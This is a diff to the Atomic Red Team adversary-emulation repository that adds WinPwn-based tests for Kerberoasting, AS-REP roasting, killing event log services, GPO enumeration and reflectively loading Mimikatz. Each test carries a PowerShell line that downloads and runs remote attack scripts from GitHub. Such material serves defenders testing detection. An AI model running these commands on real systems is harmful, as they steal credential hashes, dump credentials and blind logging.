+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #7 - WinPwn - PowerSharpPack - Kerberoasting Using Rubeus
+PowerSharpPack - Kerberoasting Using Rubeus technique via function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 29094950-2c96-4cbd-b5e4-f7c65079678f
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1')
+Invoke-Rubeus -Command "kerberoast /format:hashcat /nowrap"
+```
+
+
+
+
+
+
 <br/>

atomics/T1558.003/T1558.003.yaml

@@ -149,3 +149,26 @@ atomic_tests:
       Add-Type -AssemblyName System.IdentityModel  
       setspn.exe -T #{domain_name} -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }  
     name: powershell
+
+- name: WinPwn - Kerberoasting
+  auto_generated_guid: 78d10e20-c874-45f2-a9df-6fea0120ec27
+  description: Kerberoasting technique via function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      Kerberoasting -consoleoutput -noninteractive
+    name: powershell
+
+- name: WinPwn - PowerSharpPack - Kerberoasting Using Rubeus
+  auto_generated_guid: 29094950-2c96-4cbd-b5e4-f7c65079678f
+  description: PowerSharpPack - Kerberoasting Using Rubeus technique via function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1')
+      Invoke-Rubeus -Command "kerberoast /format:hashcat /nowrap"
+    name: powershell

atomics/T1558.004/T1558.004.md

@@ -16,6 +16,8 @@ Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003)
 
 - [Atomic Test #2 - Get-DomainUser with PowerView](#atomic-test-2---get-domainuser-with-powerview)
 
+- [Atomic Test #3 - WinPwn - PowerSharpPack - Kerberoasting Using Rubeus](#atomic-test-3---winpwn---powersharppack---kerberoasting-using-rubeus)
+
 
 <br/>
 
@@ -107,4 +109,33 @@ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d29
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #3 - WinPwn - PowerSharpPack - Kerberoasting Using Rubeus
+PowerSharpPack - Kerberoasting Using Rubeus technique via function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 8c385f88-4d47-4c9a-814d-93d9deec8c71
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1')
+Invoke-Rubeus -Command "asreproast /format:hashcat /nowrap"
+```
+
+
+
+
+
+
 <br/>

atomics/T1558.004/T1558.004.yaml

@@ -56,4 +56,14 @@ atomic_tests:
     command: |
       [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
       IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose
-    name: powershell
+    name: powershell
+- name: WinPwn - PowerSharpPack - Kerberoasting Using Rubeus
+  auto_generated_guid: 8c385f88-4d47-4c9a-814d-93d9deec8c71
+  description: PowerSharpPack - Kerberoasting Using Rubeus technique via function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1')
+      Invoke-Rubeus -Command "asreproast /format:hashcat /nowrap"
+    name: powershell

atomics/T1562.001/T1562.001.md

@@ -64,6 +64,8 @@ Adversaries may also tamper with artifacts deployed and utilized by security too
 
 - [Atomic Test #29 - Kill antimalware protected processes using Backstab](#atomic-test-29---kill-antimalware-protected-processes-using-backstab)
 
+- [Atomic Test #30 - WinPwn - Kill the event log services for stealth](#atomic-test-30---winpwn---kill-the-event-log-services-for-stealth)
+
 
 <br/>
 
@@ -1259,4 +1261,34 @@ Start-BitsTransfer -Source "https://github.com/Yaxser/Backstab/releases/download
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #30 - WinPwn - Kill the event log services for stealth
+Kill the event log services for stealth via function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 7869d7a3-3a30-4d2c-a5d2-f1cd9c34ce66
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+inv-phantom -consoleoutput -noninteractive
+```
+
+
+
+
+
+
 <br/>

atomics/T1562.001/T1562.001.yaml

@@ -633,4 +633,14 @@ atomic_tests:
     command: '& $env:temp\Backstab64.exe -k -n #{process_name}'
     name: powershell
     elevation_required: true
-  
+- name: WinPwn - Kill the event log services for stealth
+  auto_generated_guid: 7869d7a3-3a30-4d2c-a5d2-f1cd9c34ce66
+  description: Kill the event log services for stealth via function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      inv-phantom -consoleoutput -noninteractive  
+    name: powershell

atomics/T1574.006/T1574.006.md

@@ -47,7 +47,7 @@ sudo sh -c 'echo #{path_to_shared_library} > /etc/ld.so.preload'
 
 #### Cleanup Commands:
 ```bash
-sudo sed -i '\~#{path_to_shared_library}~d' /etc/ld.so.preload
+sudo sed -i 's##{path_to_shared_library}##' /etc/ld.so.preload
 ```
 
 

atomics/T1574.006/T1574.006.yaml

@@ -30,7 +30,7 @@ atomic_tests:
     command: |
       sudo sh -c 'echo #{path_to_shared_library} > /etc/ld.so.preload'
     cleanup_command: |
-      sudo sed -i '\~#{path_to_shared_library}~d' /etc/ld.so.preload
+      sudo sed -i 's##{path_to_shared_library}##' /etc/ld.so.preload
     name: bash
     elevation_required: true
 - name: Shared Library Injection via LD_PRELOAD

atomics/T1615/T1615.md

@@ -10,6 +10,10 @@ Adversaries may use commands such as <code>gpresult</code> or various publicly a
 
 - [Atomic Test #2 - Get-DomainGPO to display group policy information via PowerView](#atomic-test-2---get-domaingpo-to-display-group-policy-information-via-powerview)
 
+- [Atomic Test #3 - WinPwn - GPOAudit](#atomic-test-3---winpwn---gpoaudit)
+
+- [Atomic Test #4 - WinPwn - GPORemoteAccessPolicy](#atomic-test-4---winpwn---gporemoteaccesspolicy)
+
 
 <br/>
 
@@ -70,4 +74,64 @@ powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #3 - WinPwn - GPOAudit
+Check domain Group policies for common misconfigurations using Grouper2 via GPOAudit function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** bc25c04b-841e-4965-855f-d1f645d7ab73
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+GPOAudit -noninteractive -consoleoutput
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #4 - WinPwn - GPORemoteAccessPolicy
+Enumerate remote access policies through group policy using GPORemoteAccessPolicy function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 7230d01a-0a72-4bd5-9d7f-c6d472bc6a59
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+GPORemoteAccessPolicy -consoleoutput -noninteractive
+```
+
+
+
+
+
+
 <br/>

atomics/T1615/T1615.yaml

@@ -25,4 +25,26 @@ atomic_tests:
   executor:
     command: powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://github.com/BC-SECURITY/Empire/blob/86921fbbf4945441e2f9d9e7712c5a6e96eed0f3/empire/server/data/module_source/situational_awareness/network/powerview.ps1'); Get-DomainGPO"
     name: powershell
-    elevation_required: true
+    elevation_required: true
+- name: WinPwn - GPOAudit
+  auto_generated_guid: bc25c04b-841e-4965-855f-d1f645d7ab73
+  description: Check domain Group policies for common misconfigurations using Grouper2 via GPOAudit function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      GPOAudit -noninteractive -consoleoutput
+    name: powershell
+- name: WinPwn - GPORemoteAccessPolicy
+  auto_generated_guid: 7230d01a-0a72-4bd5-9d7f-c6d472bc6a59
+  description: Enumerate remote access policies through group policy using GPORemoteAccessPolicy function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      GPORemoteAccessPolicy -consoleoutput -noninteractive
+    name: powershell

atomics/T1620/T1620.md

@@ -0,0 +1,41 @@
+# T1620 - Reflective Code Loading
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1620)
+<blockquote>Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads. Reflective loading involves allocating then executing payloads directly within the memory of the process, vice creating a thread or process backed by a file path on disk. Reflectively loaded payloads may be compiled binaries, anonymous files (only present in RAM), or just snubs of fileless executable code (ex: position-independent shellcode).(Citation: Introducing Donut)(Citation: S1 Custom Shellcode Tool)(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Mandiant BYOL)
+
+Reflective code injection is very similar to [Process Injection](https://attack.mitre.org/techniques/T1055) except that the “injection” loads code into the processes’ own memory instead of that of a separate process. Reflective loading may evade process-based detections since the execution of the arbitrary code may be masked within a legitimate or otherwise benign process. Reflectively loading payloads directly into memory may also avoid creating files or other artifacts on disk, while also enabling malware to keep these payloads encrypted (or otherwise obfuscated) until execution.(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Intezer ACBackdoor)(Citation: S1 Old Rat New Tricks)</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - WinPwn - Reflectively load Mimik@tz into memory](#atomic-test-1---winpwn---reflectively-load-mimiktz-into-memory)
+
+
+<br/>
+
+## Atomic Test #1 - WinPwn - Reflectively load Mimik@tz into memory
+Reflectively load Mimik@tz into memory technique via function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 56b9589c-9170-4682-8c3d-33b86ecb5119
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+mimiload -consoleoutput -noninteractive
+```
+
+
+
+
+
+
+<br/>

atomics/T1620/T1620.yaml

@@ -0,0 +1,14 @@
+attack_technique: T1620
+display_name: "Reflective Code Loading"
+atomic_tests:
+- name: WinPwn - Reflectively load Mimik@tz into memory
+  auto_generated_guid: 56b9589c-9170-4682-8c3d-33b86ecb5119
+  description: Reflectively load Mimik@tz into memory technique via function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      mimiload -consoleoutput -noninteractive
+    name: powershell

atomics/used_guids.txt

@@ -985,3 +985,70 @@ f4b26bce-4c2c-46c0-bcc5-fce062d38bef
 631d4cf1-42c9-4209-8fe9-6bd4de9421be
 d91473ca-944e-477a-b484-0e80217cd789
 83a95136-a496-423c-81d3-1c6750133917
+87e88698-621b-4c45-8a89-4eaebdeaabb1
+581d7521-9c4b-420e-9695-2aec5241167f
+114dd4e3-8d1c-4ea7-bb8d-8d8f6aca21f0
+fdd0c913-714b-4c13-b40f-1824d6c015f2
+75f66e03-37d3-4704-9520-3210efbe33ce
+00e3e3c7-6c3c-455e-bd4b-461c7f0e7797
+c9dc9de3-f961-4284-bd2d-f959c9f9fda5
+eea1d918-825e-47dd-acc2-814d6c58c0e1
+3d256a2f-5e57-4003-8eb6-64d91b1da7ce
+345cb8e4-d2de-4011-a580-619cf5a9e2d7
+5b6f39a2-6ec7-4783-a5fd-2c54a55409ed
+7804659b-fdbf-4cf6-b06a-c03e758590e8
+3278b2f6-f733-4875-9ef4-bfed34244f0a
+dec6a0d8-bcaf-4c22-9d48-2aee59fb692b
+54574908-f1de-4356-9021-8053dd57439a
+97585b04-5be2-40e9-8c31-82157b8af2d6
+1cca5640-32a9-46e6-b8e0-fabbe2384a73
+bb037826-cbe8-4a41-93ea-b94059d6bb98
+7e79a1b6-519e-433c-ad55-3ff293667101
+10ba02d0-ab76-4f80-940d-451633f24c5b
+0bb64470-582a-4155-bde2-d6003a95ed34
+bc25c04b-841e-4965-855f-d1f645d7ab73
+7230d01a-0a72-4bd5-9d7f-c6d472bc6a59
+70f4d07c-5c3e-4d53-bb0a-cdf3ada14baf
+f543635c-1705-42c3-b180-efd6dc6e7ee7
+764ea176-fb71-494c-90ea-72e9d85dce76
+987901d1-5b87-4558-a6d9-cffcabc638b8
+c67ba807-f48b-446e-b955-e4928cd1bf91
+855fb8b4-b8ab-4785-ae77-09f5df7bff55
+49845fc1-7961-4590-a0f0-3dbcf065ae7e
+1ec1c269-d6bd-49e7-b71b-a461f7fa7bc8
+3fc9fea2-871d-414d-8ef6-02e85e322b80
+5bcda9cd-8e85-48fa-861d-b5a85d91d48c
+f8da74bb-21b8-4af9-8d84-f2c8e4a220e3
+cb6e76ca-861e-4a7f-be08-564caa3e6f75
+ce483c35-c74b-45a7-a670-631d1e69db3d
+964d8bf8-37bc-4fd3-ba36-ad13761ebbcc
+f3c145f9-3c8d-422c-bd99-296a17a8f567
+1ed67900-66cd-4b09-b546-2a0ef4431a0c
+2b61977b-ae2d-4ae4-89cb-5c36c89586be
+9e9fd066-453d-442f-88c1-ad7911d32912
+e9fdb899-a980-4ba4-934b-486ad22e22f4
+ce4e76e6-de70-4392-9efe-b281fc2b4087
+7ec5b74e-8289-4ff2-a162-b6f286a33abd
+e1f93a06-1649-4f07-89a8-f57279a7d60e
+56b9589c-9170-4682-8c3d-33b86ecb5119
+7f06b25c-799e-40f1-89db-999c9cc84317
+07b18a66-6304-47d2-bad0-ef421eb2e107
+7869d7a3-3a30-4d2c-a5d2-f1cd9c34ce66
+efb79454-1101-4224-a4d0-30c9c8b29ffc
+8c385f88-4d47-4c9a-814d-93d9deec8c71
+78d10e20-c874-45f2-a9df-6fea0120ec27
+29094950-2c96-4cbd-b5e4-f7c65079678f
+aaa87b0e-5232-4649-ae5c-f1724a4b2798
+ccf4ac39-ec93-42be-9035-90e2f26bcd92
+5ccf4bbd-7bf6-43fc-83ac-d9e38aff1d82
+5c16ceb4-ba3a-43d7-b848-a13c1f216d95
+8b56f787-73d9-4f1d-87e8-d07e89cbc7f5
+fa714db1-63dd-479e-a58e-7b2b52ca5997
+079ee2e9-6f16-47ca-a635-14efcd994118
+afe369c2-b42e-447f-98a3-fb1f4e2b8552
+db965264-3117-4bad-b7b7-2523b7856b92
+0c0f5f06-166a-4f4d-bb4a-719df9a01dbb
+ec1d0b37-f659-4186-869f-31a554891611
+e5e3d639-6ea8-4408-9ecd-d5a286268ca0
+124e13e5-d8a1-4378-a6ee-a53cd0c7e369
+57799bc2-ad1e-4130-a793-fb0c385130ba